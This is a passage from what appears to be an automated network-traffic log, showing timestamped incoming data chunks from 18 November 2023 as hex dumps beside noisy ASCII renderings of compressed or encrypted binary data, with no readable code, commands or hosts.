2023-11-18 09:02:40 UTC	6876	IN	Data Raw: 71 5e 17 ca 66 74 5a d3 8a 4e 1c a7 b6 44 a0 d3 db 0f 36 e9 c1 99 5c 2f ad f4 0a 4e d0 85 fb 48 28 67 4b 1b e3 b9 50 b4 7f 84 52 16 b5 67 ff 48 bd e7 08 bd 89 80 3a 1f 41 c9 67 06 74 af 6c 1a 75 e0 ab 81 00 73 5c 14 07 fc db 81 8c e0 a3 7e 92 e0 ff 48 42 82 f7 24 a5 ff 09 54 d3 de 6d 4a cf d0 8b 55 da 73 db 18 de ef 10 52 5b 37 90 db 33 7a 7a 1e 03 f2 6d 26 29 a1 95 dc 8e 89 e2 55 74 a7 f5 3e c8 ea f5 56 84 4e d0 fd ea 4a e9 50 ee 25 74 e8 a7 47 e8 d0 0e 9e ff aa ee 74 94 3b 0d fc 19 78 fe 70 7e 10 89 3e 91 d0 c3 49 e9 91 cd 0d 4b 18 2e 4f 94 3e ef 6b 17 b2 ad 49 b8 fb 81 cf 98 0d 69 37 94 d2 2e 1b 69 f7 e7 5e e7 61 f6 53 2c 98 23 2e 0b 7d 50 9b 78 b4 b4 3d a4 9c 37 24 2a e5 46 09 cc c6 7d 93 83 87 b6 ab ad 14 f0 61 21 bd d6 cc 6f 22 a0 59 26 99 2d 85 64 Data Ascii: q^ftZND6\/NH(gKPRgH:Agtlus\~HB$TmJUsR[73zzm&)Ut>VNJP%tGt;xp~>IK.O>kIi7.i^aS,#.}Px=7$*F}a!o"Y&-d
2023-11-18 09:02:40 UTC	6892	IN	Data Raw: c3 e7 0a 77 6c 30 84 cf 54 6d 40 d4 6f 1a 90 19 2d 7e d3 aa 9e f8 8d 6b ef 3a 77 6c 30 6a 7b 06 ed d4 ae 50 db 99 d1 18 c3 07 ea b8 a5 57 1c 27 c1 6f 2e e1 25 8b cd a2 86 97 a7 9e 4f 82 5f 6a af d2 61 80 5f a3 76 be 79 26 29 7e 77 a5 1b e3 77 e5 ee 9e f8 35 58 6f cb ca 70 bd e5 f1 f5 e6 d0 c6 04 e8 49 40 cd b6 e7 12 d6 1f f4 bf 8e d6 1c 37 c4 86 9b 8f 0c 34 42 a9 bf f6 40 8f fe a1 fc c2 24 e5 dd 93 8d cb 57 24 29 df 38 c1 b8 7c 66 b2 f6 a7 18 97 7f f2 6c e3 f2 4d 25 c6 e5 67 26 29 5f 5f 6e 5c 3e 2f 49 f9 ed e3 8d cb db 92 b5 9f 04 3f c5 5f 1d 55 8c ca 9b 92 c0 9f 9e a4 7c 53 99 71 79 69 af 71 79 47 12 f8 d7 25 29 df 94 04 3f 6b ae 4c 32 5f 49 e6 b7 36 49 79 53 12 f8 8b 93 94 2f bd 26 09 7e 92 b5 9f 04 fe e2 d1 c7 0d c7 5b 9f 04 3f e9 49 ca bb 27 19 97 ef Data Ascii: wl0Tm@o-~k:wl0j{PW'o.%O_ja_vy&)~ww5XopI@74B@$W$)8\|flM%g&)__n\>/I?_U\|SqyiqyG%)?kL2_I6IyS/&~[?I'
2023-11-18 09:02:40 UTC	6908	IN	Data Raw: c4 fe 22 6d 36 90 17 5d e4 1d 57 ef e6 79 c6 91 2a b7 ae e9 af a5 e0 11 42 19 0c 4c 2b 8f db cd ef 03 20 79 1b 25 af ec 49 c9 ab 8d c9 0c c4 7f f3 e4 53 6d 48 2a d2 dc a7 42 36 cf 6f 6d 10 38 d0 93 00 40 f8 f3 43 cb 9f c6 27 0f 23 5e ab c8 86 2a 3d 76 ea e3 94 9a 11 3b 75 26 a5 66 c5 4e 1d 4b a9 c3 11 80 61 78 91 1c 2b 9b 9d b2 e5 c4 4e 6d 4f a9 63 62 a7 aa c4 80 e6 c5 4e dd 46 a9 f9 b1 53 57 53 6a 41 ec d4 27 29 b5 30 56 aa cb c9 52 8a 62 a6 dc 01 db 61 cc 94 e1 2c 65 5a cc 94 cb 58 ca 8c 98 29 70 35 35 bb 74 35 46 d1 93 8c 98 c0 8d 5b 2a 2e 27 44 e9 d2 4a d6 dd a0 34 e4 bd 06 fc 89 fc e0 7f 9a 72 ab ea 90 9f 10 cb 96 f7 01 41 59 85 b6 11 2c c1 c1 13 52 96 5d cd bf ac 0d ec 28 c1 ce 00 36 8c bb 2f c3 85 3f 85 55 e3 2a 04 a4 75 da 4b 04 66 1f 57 3f e6 3a Data Ascii: "m6]WyBL+ y%ISmHB6om8@C'#^=v;u&fNKax+NmOcbNFSWSjA')0VRba,eZX)p55t5F[.'DJ4rAY,R](6/?U*uKfW?:
2023-11-18 09:02:40 UTC	6924	IN	Data Raw: b3 b1 6e a8 a5 e8 a5 47 09 6d a1 eb 98 fe 3e 07 ae 1d 8e 76 1c b1 f9 f5 6d 0a 87 fb 39 7f 1b 55 35 76 0e c6 50 35 27 3d ed 25 9f 41 43 5b 58 43 0f 91 f2 a1 3d 34 ce 47 bb d3 4e a3 02 9b b7 91 b7 72 46 7d 9b 62 64 63 62 65 aa a0 8c ad 47 19 aa 3f a5 e1 98 53 30 94 8e 73 08 b9 84 94 0c 24 a2 2c b0 c6 90 ee 6e 05 8b ab fc d1 78 2f 86 ad 57 7f 84 f8 38 a8 11 a7 61 76 92 e5 03 7f c7 3b 53 12 48 38 e7 e1 83 ad 9e 26 67 34 9e 1b 86 8a 48 12 af d8 93 97 46 94 68 b0 15 78 eb e8 40 7f 7a 1f 35 09 56 c4 89 f1 df e1 3d 0f 67 61 23 25 bc 8f 9a 51 41 0d f0 b3 99 7b 60 7e 42 97 a2 dd 6c 22 e2 10 ff e5 5c 06 18 44 66 80 5c ee 43 1c e2 77 14 cc 8f 50 44 0e 73 c9 bd 8a 62 10 0b e0 76 70 1f 2a 84 c6 d1 8b 42 12 dc f6 48 e5 85 4b 91 9e a5 73 c8 cf 18 40 22 78 33 40 b1 de ed Data Ascii: nGm>vm9U5vP5'=%AC[XC=4GNrF}bdcbeG?S0s$,nx/W8av;SH8&g4HFhx@z5V=ga#%QA{`~Bl"\Df\CwPDsbvp*BHKs@"x3@
2023-11-18 09:02:40 UTC	6940	IN	Data Raw: 7a 75 5e a7 43 97 41 08 4c f5 4f 17 64 89 96 9e 4a bb 12 07 b3 00 08 c6 12 35 9b 9e c6 17 d0 ec cd f4 67 0e 86 24 e8 61 84 06 d7 6a d2 6d 2f e0 64 67 77 4b 0f 90 c5 9b 4a 98 a8 ea 74 1c 8c 4c ad e8 99 0a f4 5e 14 82 22 9e bb d7 08 d9 57 44 4f 3d 42 3a f6 85 03 cd 66 77 60 aa ab 73 48 c9 49 7f de 7e 57 67 42 49 a3 63 9c 74 98 b0 9d c5 31 5e fa 96 98 2e 46 d6 23 53 23 dd 00 9a 22 ed bc bb 23 6e 85 d5 7d bc 2b b0 80 6e 7a ac 2c 56 ca f2 bd 66 06 2e 24 66 a0 5c 2d 1f 72 ef 06 10 a9 dc 43 dc 79 2b 19 40 e7 00 a2 db d2 05 64 98 c0 30 26 80 60 b0 99 d1 06 cc 48 2b cd 11 86 64 05 ef 16 33 27 cc 02 66 53 05 0a 3b e8 7b ae bb c7 38 67 18 41 d6 b5 73 f1 8c b8 92 51 f0 7a 0f 12 2d 8c 44 98 03 b4 c0 66 90 f1 92 be b0 d7 67 77 13 e3 0d 40 8f 3f d6 e9 25 ed 8b de 72 b8 Data Ascii: zu^CALOdJ5g$ajm/dgwKJtL^"WDO=B:fw`sHI~WgBIct1^.F#S#"#n}+nz,Vf.$f\-rCy+@d0&`H+d3'fS;{8gAsQz-Dfgw@?%r
2023-11-18 09:02:40 UTC	6956	IN	Data Raw: c3 65 7e 66 3f e4 3d d4 2c cb fb 49 59 de 6b 9a c8 fb 60 95 29 cf 2d ef da 3b e4 dd c0 e4 bd c6 36 c4 4b de 23 b5 f6 3d 26 2e ef b1 5e bf 75 45 6c e1 d5 1c aa 48 fb 55 2e ed dc df da 4c 15 dd ef 9f 4a 42 dc a8 c8 7b e3 5d e4 fd 8d 26 f2 1e f1 af f2 ee 72 cb bb b0 87 e4 5d e5 96 77 fb bf ca bb 6a 1f 97 f5 bd ad 8f e9 2b a5 43 1d 6b c5 c5 e4 fd 8b f6 4b 36 95 fd 34 76 4e e1 62 2e fb 6b 65 d9 7f c5 6b ff ad 2c ff a7 64 f9 2f 65 22 3b f8 2e f2 9f ef 50 71 f9 97 6b 88 f7 00 3a 1a cd bd 69 94 ca cb 2b 8c cb 7f a1 77 64 a2 e5 47 26 ff 83 3d f2 9f e7 e3 78 f9 1f f2 1f e9 25 ff 2c df c6 c8 bb cb 3f 84 73 10 eb 03 a2 85 3a b3 97 9c 4a 87 a4 1c c7 64 1e cf 3f e4 9d 6c b7 c8 aa 31 9f cb bb dd ba 98 77 17 d7 16 fa 87 0b 33 3b 4c fb 2e a2 5c dd 78 a7 3b 91 cc 51 d0 45 Data Ascii: e~f?=,IYk`)-;6K#=&.^uElHU.LJB{]&r]wj+CkK64vNb.kek,d/e";.Pqk:i+wdG&=x%,?s:Jd?l1w3;L.\x;QE
2023-11-18 09:02:40 UTC	6972	IN	Data Raw: 56 3a bb 6c 08 d9 86 e4 c7 6c 63 bd fd 4e 73 ba 4c 29 9f cf 5f 06 cb 56 22 0d 87 d8 24 9e 94 eb 65 25 32 a6 89 95 c8 bb 6d f8 8c 41 4e 11 19 fc 68 e8 7c 34 66 5b b0 9c fb af b2 92 4f d3 22 32 ca 93 4a 2c 05 c6 36 ce 76 2c 1d 8a 3e 27 ec 98 7e df 1c bf b4 08 c1 58 c9 ad f1 33 69 fd 39 80 66 a5 75 59 96 22 63 a0 93 8c e8 00 01 fe d3 4c 91 03 05 e3 f5 dc 5c b9 7d ed 91 48 35 6d 40 61 e1 8b 29 82 35 02 83 77 35 2b 4b 12 37 b1 64 d6 93 21 e2 c6 61 3e b4 ac 6a c9 80 66 a4 35 6e 97 2d da 37 ec 98 ec a7 a2 8f 8f 94 2b 6e 24 4a 43 6b 47 95 e2 c6 0e e2 c6 ec b4 cd 6b 28 c6 8c 44 6d 17 d1 42 fb 87 a5 c2 8c 78 6d b0 ae c8 9c 65 78 94 8e c9 97 fe 22 73 c7 60 67 37 b7 bd 73 0e cd 6f e3 dd a0 b6 b6 7e 6d 69 9a fb 01 64 25 62 af e1 3c 3f 00 5a 2a 31 9d 3a 49 f2 95 56 9b Data Ascii: V:llcNsL)_V"$e%2mANh\|4f[O"2J,6v,>'~X3i9fuY"cL\}H5m@a)5w5+K7d!a>jf5n-7+n$JCkGk(DmBxmex"s`g7so~mid%b<?Z*1:IV
2023-11-18 09:02:40 UTC	6988	IN	Data Raw: 9d bc 06 ad 9d 06 06 d7 1c ec 79 36 18 4c 0c d8 e7 27 60 ac 33 32 33 85 4c 30 cd 16 60 1a e3 a1 9d 1f 01 53 59 00 c6 f2 3c 58 d7 b3 60 41 37 c0 c0 5e 00 5b f8 02 5a bc 1a 6c 68 3d d8 f3 11 b0 80 a7 c0 6e 52 c1 48 5e 05 83 bd 0c c6 13 0c 16 56 01 36 f3 0d 58 c1 00 b0 d9 7b c0 00 7e 07 6b ab 01 a3 96 c0 ba 4e bc 0e 70 05 63 ee f4 0b 94 01 58 d6 56 b0 85 3f d2 a1 cc 89 3a 13 55 22 ba 4d 34 85 e8 08 51 48 a2 54 44 c1 68 78 40 54 97 68 30 51 2e a2 56 44 db 88 9a 12 65 26 1a 4a 94 90 e8 0f d1 2c a2 a2 44 73 88 12 12 4d 21 1a 4a 94 9d 28 07 d1 6b a2 33 44 e7 68 18 41 d4 9d e8 3a 51 33 a2 ca 44 13 89 7a 12 cd 21 da 42 43 08 a2 91 44 d3 88 3e d3 d0 82 28 20 d1 67 a2 ba 44 2f 89 6e 12 d5 21 6a 4c f4 9c e8 1d d1 5c a2 73 44 4f 89 ae 11 a5 26 da 44 f4 9b e8 22 d1 69 Data Ascii: y6L'`323L0`SY<X`A7^[Zlh=nRH^V6X{~kNpcXV?:U"M4QHTDhx@Th0Q.VDe&J,DsM!J(k3DhA:Q3Dz!BCD>( gD/n!jL\sDO&D"i
2023-11-18 09:02:40 UTC	6992	IN	Data Raw: 8d 58 7b 11 06 1a b3 f2 b1 bb 11 eb 2a 42 77 23 d6 23 cc 37 62 bd c3 f1 1b b1 88 34 e4 4f 9f 65 88 30 dd 80 65 86 b0 c4 88 d5 0e 61 94 31 cb 1e a1 dc 88 d5 1f 23 94 3f c2 6c 68 77 d8 ce 62 a9 11 e6 42 b9 60 ff 26 ac 2c 84 ee 2c d6 66 84 81 2c d6 21 2c 6f c0 3a 8d e3 61 b1 2e 23 cc d4 63 3d c2 fe 0c 58 6f 10 12 fa ac 2f 08 8b 0c 58 ba a3 91 bb 11 ab 11 c2 6c 23 96 15 c2 dc 86 2c 47 84 25 86 2c 0f 6c 37 62 85 22 2c 32 62 c5 8c ae 63 0d bf da 42 3b 3d c5 42 9f 71 e9 b1 c8 8d e0 0f 63 53 e5 61 6c 6a 11 d0 f7 a1 34 95 0d 67 53 d9 80 fc 61 55 b4 28 8c c6 96 35 f8 fc 61 55 7c 0d 69 ec f3 87 d0 f4 3b f7 e1 80 6f 21 dc b9 40 9f 87 d2 64 1c ce a6 b2 18 37 0d cd 0d a3 b1 69 0d fe f0 61 55 7c 0d 69 ec 99 43 68 fa 9d 3b 37 8e af 70 23 60 18 70 83 11 9e eb e3 43 84 86 Data Ascii: X{*Bw##7b4Oe0ea1#?lhwbB`&,,f,!,o:a.#c=Xo/Xl#,G%,l7b",2bcB;=BqcSalj4gSaU(5aU\|i;o!@d7iaU\|iCh;7p#`pC
2023-11-18 09:02:40 UTC	7008	IN	Data Raw: 94 d0 0d 9e e3 af 89 f7 ff 63 ef 3f c0 a2 68 9a 47 71 b4 07 58 72 ce 99 25 2c 51 96 9c 73 06 25 0a 98 25 2f c1 25 c9 12 45 05 44 54 54 44 45 c4 2c e6 80 88 19 11 15 10 73 42 51 44 41 05 45 c5 8c 39 3b 7d 7b 66 17 58 d0 f7 7b bf df 39 ff 7b cf 79 9e fb 9f a5 a8 ae ea 9c aa ab c3 4c 9b 23 43 2a 37 e3 af 34 51 85 ac cc 4c a2 49 8f b6 c9 49 cb 88 e3 66 0e 16 dd 20 cd 4a 4a 49 4f 1e f2 36 d8 93 46 92 a8 cc 22 63 50 bb 89 4d 1c b4 60 a7 13 e5 2d 29 96 39 c8 1b cc 43 40 50 60 18 77 25 a6 a4 27 99 c7 a4 12 26 0e 23 38 28 c8 7f b0 b2 89 26 39 88 87 9b e6 78 2f 8f 60 ee 20 32 c8 e8 88 aa 66 31 d8 59 62 11 ec d0 30 37 8f 71 91 e9 59 2c 32 5d 59 ac ac 98 91 1d f4 9d 00 ef 6e be 08 e2 fd 57 de 3a 02 bb f2 f3 9e 24 30 10 e4 bd 45 e0 60 7e de d7 04 8e e2 e7 e5 a1 44 10 Data Ascii: c?hGqXr%,Qs%%/%EDTTDE,sBQDAE9;}{fX{9{yL#C*74QLIIf JJIO6F"cPM`-)9C@P`w%'&#8(&9x/` 2f1Yb07qY,2]YnW:$0E`~D
2023-11-18 09:02:40 UTC	7024	IN	Data Raw: cf 39 bc 0c 6e fd 60 90 08 4b 03 ff cd 33 3a 5c 22 fe 74 a4 27 a4 9b 78 33 f9 b8 e2 9f 83 78 bd 2b a6 32 e3 e8 d1 c9 c9 41 19 de 49 19 ac cc 30 a2 10 e2 e8 9c 18 fd 93 08 5d 83 78 16 49 0e 87 75 7f 32 3b 7f 4b b9 ee 8a 7f c3 09 8b d4 0b c2 c2 c6 fb b9 87 87 79 85 b2 f3 34 f8 3d 3d 7d 34 86 df 98 32 65 a8 0f 72 f3 86 18 dc 65 85 0d 7f a3 90 18 f7 a3 4c fe d4 0d 83 4d d9 bc 38 3a f9 e9 dd 38 3a 6b b8 e3 c7 d1 19 23 46 4b e4 86 7b 54 27 ac b9 95 02 54 0c 7f 28 34 71 f4 d8 51 8a c6 3f 3c 72 08 96 13 85 ca 29 8f 6a 94 2f c9 45 ee 4c f9 51 fc 5d 04 9f ee cd 54 18 c5 3f 42 f0 51 fe 94 46 f1 cf 22 3e 15 f1 95 47 f1 6f 21 be 29 e2 5f 1b c5 ef 43 7c 57 c4 97 e6 1d c9 ff 8a f8 c1 88 1f 47 4f 23 24 03 58 ce d5 36 2e 22 1d 6c 39 6a 2f 83 59 45 7d c5 2d 39 01 f5 84 cc Data Ascii: 9n`K3:\"t'x3x+2AI0]xIu2;Ky4==}42ereLM8:8:k#FK{T'T(4qQ?<r)j/ELQ]T?BQF">Go!)_C\|WGO#$X6."l9j/YE}-9
2023-11-18 09:02:40 UTC	7040	IN	Data Raw: 03 01 2a 8e 7f c2 3f c3 5d cb cf c0 39 33 15 e0 81 bc a3 60 51 d8 4d b0 98 5f 1d 4e 36 55 05 9a eb c5 a1 d2 bb 75 a0 ec 5a 0a e6 cd 72 86 b2 fa 4c 7c f1 ba 0b 30 a2 e7 31 dc 58 a3 0b b6 1d 54 c2 8d b3 79 a1 f8 43 05 ec e6 e9 10 98 9d ff 1c 13 eb 60 c0 7c 9b 7c 5c e5 cb 0e 60 1e eb 0f 97 de a1 c2 68 37 0f a8 28 aa 0a f6 4f 08 c4 5c bf 46 81 ea 85 1e c0 dd e6 23 ac b8 1a 05 95 f9 35 61 8c 45 28 b6 b6 e3 06 e4 39 6e 0d 95 ba 44 80 99 c7 17 5c ba d2 17 8a 29 f9 02 c3 a0 3b c0 90 4f 17 53 59 b2 1c 56 36 2a 00 e9 ed f3 c1 e7 b0 e3 78 ee f9 44 38 b7 2b 0a d8 66 bd 84 62 6a 77 70 4f 13 61 b8 6b dd 7c 7c 8d ee 79 e0 7e 68 32 bc 48 af 81 62 b1 a1 b0 bd f1 37 dc 6b 6c 88 2d be 39 1b dc 41 6d 53 f4 d9 06 10 af 93 8e f3 56 78 00 cb ce 7c f8 a2 c6 1a c6 94 3a 83 af 5d Data Ascii: ?]93`QM_N6UuZrL\|01XTyC`\|\|\`h7(O\F#5aE(9nD\);OSYV6xD8+fbjwpOak\|\|y~h2Hb7kl-9AmSVx\|:]
2023-11-18 09:02:40 UTC	7056	IN	Data Raw: a9 f7 e0 aa 5b ee 34 52 62 85 2d 16 e1 f8 f2 51 13 1c 1d 77 92 1e 61 ff 83 83 2e a3 71 fc 8b 95 b0 ea fd 7c fa a9 68 11 98 66 df a3 3a ee ef 51 b0 7b 35 ae bd fa 19 ce 28 6c 46 cd 6e 7f 88 0d f9 40 16 fe dc 00 ff 66 bd c1 81 55 53 40 2b 56 96 76 a9 9a c1 92 50 39 7a 3a 79 3b 4c 3a d7 48 9b 67 4c 44 56 c7 2f fa f7 ba 18 a7 c1 24 fa ed 3b e2 55 4d 01 fd f7 fe 0f bc f7 3c 0a 38 9b 83 37 d2 0a c9 86 ed 09 b8 a5 61 1d ed d4 c9 c2 e6 2f 40 5a f4 3a 30 cc 37 01 3d 9e 94 c3 fa 8b ba 94 93 60 02 b2 97 fe f3 56 bb ad 70 84 bd 86 dc f4 d3 45 ef 1d 8b b0 cf bb 18 ee 1d 0a c7 48 df 4f 70 4b df 8e cc 7e 52 82 99 19 be 44 73 e7 21 18 6b cf a1 51 f1 3b d0 6f 5e 22 34 d8 3b c3 19 f7 89 f4 76 ec 1f f8 fc 72 16 fc ae 8e 45 fd 1d 72 30 d8 96 06 9f 7e f5 e0 d2 ec d1 b8 eb bb Data Ascii: [4Rb-Qwa.q\|hf:Q{5(lFn@fUS@+VvP9z:y;L:HgLDV/$;UM<87a/@Z:07=`VpEHOpK~RDs!kQ;o^"4;vrEr0~
2023-11-18 09:02:40 UTC	7072	IN	Data Raw: e7 9e de 42 10 8a 0e f3 3c c7 9e 24 82 ce 58 e1 19 7f 63 9e ce 6e 29 e7 e3 e7 16 4e cb 8f 75 a2 cb 75 c9 d2 2d 0b 2f 89 57 ee b9 c8 85 69 52 c9 49 ef cb cc 1b 37 d5 c9 a6 13 c3 a0 b8 f6 19 78 6a 6a 08 b2 7d ab a4 8b 7e f4 31 7e 94 29 73 3e ee 8e 27 b7 7f ee 91 58 5c fd cb 7a b8 5a 4b 32 71 b5 9c f8 dd 76 37 8e de e1 8f d2 ca 4c 05 96 ea cc 78 c9 fc d9 b3 80 b3 3e 81 bd f7 07 91 6e 0b 63 b2 87 4d c2 59 4b 42 b8 bc 78 49 00 5b a7 61 88 c5 38 f2 53 da 21 7b 4d 74 e6 e3 0c 9e 89 44 8d 3c 6f 9d 40 a2 9d 33 f9 5a d7 d9 e2 33 c9 a7 39 4b 7a 8f 90 f8 bf 79 0c a7 b1 3c 61 f8 c1 3a ee f6 3d e6 c2 fe 2e 0e 9b 6b 50 2c 26 2a 3f 19 bf 8f e9 31 15 6f 3c 91 44 46 ba f3 ac 97 3c 95 56 34 c4 89 ff 84 ae 15 b6 4c 74 25 fb 56 77 72 85 57 a3 b9 36 d1 df d8 fb 1c 03 38 7b e5 Data Ascii: B<$Xcn)Nuu-/WiRI7xjj}~1~)s>'X\zZK2qv7Lx>ncMYKBxI[a8S!{MtD<o@3Z39Kzy<a:=.kP,&*?1o<DF<V4Lt%VwrW68{
2023-11-18 09:02:40 UTC	7084	IN	Data Raw: 01 aa 5c 31 99 36 fe 78 2f dc d8 2f 18 c6 f6 a5 ab 89 97 6c f5 09 95 22 08 37 6b ce 56 c2 80 91 78 da 8a 8f ae 30 f4 fb 24 e6 1e 73 30 63 ec bb c7 70 d9 d2 5b 50 e5 bb a1 cc f3 4f 7f 61 36 6e 14 50 d5 60 57 d8 48 b7 07 29 28 bc 27 ee e6 d7 ef 8c ac 7b 6b c9 b4 1b ae 8c 94 6d 39 f0 b9 a8 26 82 d9 fd 7c 8a 1a 76 25 a9 6f a0 25 46 7f ff 13 8a f8 3e 9b 72 e2 77 04 bd d7 8b ab 54 03 ee 49 dc fa d3 9e a4 fa 28 73 68 d6 c9 7e f8 07 92 f9 70 20 6f 35 9c 3b 6d 23 66 7c 51 3a 79 d6 a9 91 d0 98 c5 42 ac 41 f6 66 7c fc 9e e1 b0 7d ce 03 ca 9b f2 cf d0 b1 a0 a5 a4 0b 6b ab a1 4f 7e 4c 5c bf 88 75 cc 9c c7 fd a1 6a cf 1a ba f0 db 3b e2 d6 da 79 38 bf d7 fb f0 7a ee a7 61 38 43 c2 a8 1a b1 16 a7 5b ef 84 8f 9c b6 95 de 77 f8 2d 7c 0d 6b 0b 61 e3 4e 47 a2 99 4b 36 f3 25 Data Ascii: \16x//l"7kVx0$s0cp[POa6nP`WH)('{km9&\|v%o%F>rwTI(sh~p o5;m#f\|Q:yBAf\|}kO~L\uj;y8za8C[w-\|kaNGK6%
2023-11-18 09:02:40 UTC	7100	IN	Data Raw: dd 5d 1d d8 60 22 30 9a 82 04 0c 12 b3 db 4e 54 b7 a1 b4 1d a9 de 4e 49 7a 2e 77 7b 2d e9 2a 5e 41 ad b3 43 d7 15 2e 5b bc ec 77 05 9d 85 9f f0 14 40 ff f1 12 ed 94 c6 51 07 b0 64 cb df c5 37 e6 ff d0 be b2 1d a0 ad fc a5 7d 54 3c f2 ff 7f cf 3e d1 6e d0 5e 73 ff 7d 1c 94 ff 65 fb a0 6d ff 6c 9f 93 23 f2 48 a5 75 d2 8b 50 5d 38 59 5f 66 1f 5e ea 90 6b 6e af 20 c1 42 e0 44 c7 40 ff da 04 fa 7e 3e e8 d7 7b 80 7f 3f 18 23 80 0d d9 7b 81 1f a0 68 23 08 db d8 d1 a6 2a 05 9e 37 90 ab 53 a0 eb b6 83 b8 80 63 2b d5 3f ab c8 53 50 75 10 f0 b7 82 b1 68 97 a7 c0 c9 51 fa dc a8 2d 37 28 dd 69 7e 90 f6 3b 46 66 bf 77 ef 20 c1 84 de 7f b6 9f fd 1f ec 67 01 57 b5 f9 cf f6 4f 50 ac 8a 09 ff 5c 13 54 7c 5b 1b 67 f5 09 12 f4 e8 f3 0f e5 bf b1 eb f6 43 87 ff dc 6e 54 da df Data Ascii: ]`"0NTNIz.w{-^AC.[w@Qd7}T<>n^s}eml#HuP]8Y_f^kn BD@~>{?#{h#7Sc+?SPuhQ-7(i~;Ffw gWOP\T\|[gCnT
2023-11-18 09:02:40 UTC	7116	IN	Data Raw: 5c 02 46 44 4d c5 8e e7 ea f1 00 92 c4 96 33 d6 96 b1 3a 03 fa 53 b6 f8 95 5b dc c9 c6 ed 4f 8d 9e ec a8 5b 94 65 49 a4 29 00 36 ff c2 74 2b 63 9d 95 83 2d f3 ca f6 07 22 bc 01 67 a6 aa a6 36 a2 46 55 b4 a6 64 b4 0b 25 fe 57 d3 7d ee c8 1f 3e 7f 09 db 8e b2 4e 3a 39 b0 59 d5 19 28 8a 1f d6 aa 53 41 ac 4d c4 3a ea 14 6f e2 77 97 07 46 ab 8a 30 72 93 28 d8 d4 94 b2 9e 1f b8 bd 8b f8 11 06 ed fb b6 f6 56 cc 8d c8 f3 d5 74 35 15 f1 3a ce d8 a3 fc b9 56 2d 8f f2 c1 20 85 ee 17 0f b5 b1 69 c8 f8 e8 76 88 c7 f9 fd 0d 24 60 b5 bf aa 0e 4f 70 bd 3a 26 c3 63 70 ce 8e d5 e6 7d 1b df 9b 8d ed 4e 35 31 2e 88 ae ba 89 b6 b3 30 55 c3 ac 57 d6 26 52 aa 33 08 d5 9f bb 50 4d ca 30 34 e5 ee 0f 5d 7e 8f 9f 2c 8c 0b dc 3e 4a 62 9c 76 10 4b c9 b3 a3 0e 49 4d 54 fb a3 48 57 65 Data Ascii: \FDM3:S[O[eI)6t+c-"g6FUd%W}>N:9Y(SAM:owF0r(Vt5:V- iv$`Op:&cp}N51.0UW&R3PM04]~,>JbvKIMTHWe
2023-11-18 09:02:40 UTC	7132	IN	Data Raw: ca 57 29 72 91 ac 0e 5b 92 1a 24 0b 17 a8 ab ab eb 1b a6 1a 58 6a 60 ab 41 48 0d 12 d5 20 59 0d 52 d4 e6 83 4e d4 89 a6 3a d1 34 27 9a ee 44 33 9c 68 a6 13 cd 72 a2 d9 4e b4 ba 13 ad 59 79 d8 56 3b 86 e9 24 5a 63 d1 18 c7 2e 76 6c db b1 4b c2 cb 6b 2f 5e f1 63 e9 18 a3 d4 89 56 93 3d b3 1c 3b e8 d8 c9 8e 5d 79 ce fc 7b 76 a8 63 44 0d e4 b6 1c 6d 69 5b b2 5a d4 1d 1b 25 45 96 29 17 96 be 43 f4 91 4a b7 12 9d 68 2d 6c 3a 18 0c b9 97 16 17 06 97 26 97 ca 6d 2e 13 2b f7 f7 de 16 a6 91 a3 47 b9 1c 45 2c 43 8f 2c 3d 52 c7 ca 36 9c 68 81 13 cd 71 a2 f9 25 63 f1 3d ee 4b b2 e1 8d 4c 3d b2 f4 c8 d6 a3 a0 1e a9 73 20 39 e2 5d 39 e2 5d 3b e2 5d 3d e2 5d 3f e2 4d 10 d1 33 84 b3 d5 20 47 0d 72 f5 e9 98 ab cf c7 3c fd 10 53 0f d7 60 2a 1f a8 3c 7e 26 0f 9c a9 af 93 a6 Data Ascii: W)r[$Xj`AH YRN:4'D3hrNYyV;$Zc.vlKk/^cV=;]y{vcDmi[Z%E)CJh-l:&m.+GE,C,=R6hq%c=KL=s 9]9];]=]?M3 Gr<S`*<~&
2023-11-18 09:02:40 UTC	7148	IN	Data Raw: 60 13 6d 49 f7 40 97 2e 01 72 af 04 f6 13 0c 5d 91 09 ec e2 20 99 a8 01 bb 99 0b cd 77 04 c8 b8 35 a0 e7 29 e8 8a c3 d0 dc 62 40 f5 91 80 ca a3 81 c4 82 80 d4 da 42 97 ef 01 96 40 d0 22 09 9a 6d 3f 90 ae 02 50 a7 0e d8 48 32 a0 d1 28 60 7f 55 40 86 8b 80 4c 0f 01 aa 2f 06 94 af 00 52 6e 0b 6c ef 28 b0 94 30 82 06 80 3a 22 60 63 7b 81 35 89 a3 6e 5c 3c 09 68 7d 04 d8 65 06 a0 e8 9c 2e b0 60 02 74 3d 0c 2c 6b 14 90 c5 12 60 05 c1 40 9e 07 80 f5 b5 84 ae 3b 11 38 67 d6 3c e8 f6 05 80 be a7 80 5d 64 00 6a ed 81 ae 0e 00 52 3c 00 64 b8 10 ba 68 34 a0 c4 4c 60 55 7b 80 b5 32 80 ce 87 80 54 09 59 b5 00 16 22 02 74 4b 05 52 51 40 37 07 01 2a 1f 03 d6 bb 18 d8 cc 02 60 47 0a 40 d9 25 80 3e 07 81 4c d2 80 95 9e 00 96 ad 80 6e af 00 34 3d 0e 5d be 10 58 dd 6c 60 2d Data Ascii: `mI@.r] w5)b@B@"m?PH2(`U@L/Rnl(0:"`c{5n\<h}e.`t=,k`@;8g<]djR<dh4L`U{2TY"tKRQ@7*`G@%>Ln4=]Xl`-
2023-11-18 09:02:40 UTC	7164	IN	Data Raw: e8 5e 1b 78 a5 8b 86 74 a3 a8 cd 62 32 0b c3 49 24 bf 1f f3 4e d0 71 82 9d 8b a2 30 db 10 e5 28 d4 0f 89 8d 65 03 86 4c 35 fb 54 16 17 1d cd 0a 83 09 9c b3 c9 c2 c6 1a 79 b2 67 32 35 b6 9a c8 61 c1 6c f6 5c 0f 6f 41 66 88 32 a9 3c d9 78 ee 6b a7 52 f1 a6 7f 95 e4 0f 5b fe 19 50 ee 7a 28 77 25 7f 7f e9 04 9d 6f 57 b2 6d 4c 60 ab 78 b0 96 2c ec 15 80 49 00 77 ab 79 3a de 6f 9c a0 ba 3e 95 ec f8 4f 60 1f 02 ac 81 fd 46 20 0b 3b ce cb 2f 88 85 5d 3d 41 f7 32 2a b9 be 01 77 fb 04 a5 0f 42 71 0a 27 7b 63 9b dd dd 3c f7 9c 1f 9c 3d 49 f7 7d aa 79 f5 bb c0 c2 c8 99 23 72 91 4e 73 8a 8c 91 a7 e8 f7 ab 79 6d 16 7d ea be f5 af 29 ff 80 15 35 5f 93 26 95 7b a8 f0 cd a3 06 68 22 f1 59 ff 74 99 f6 5f be 37 fa bf 7c 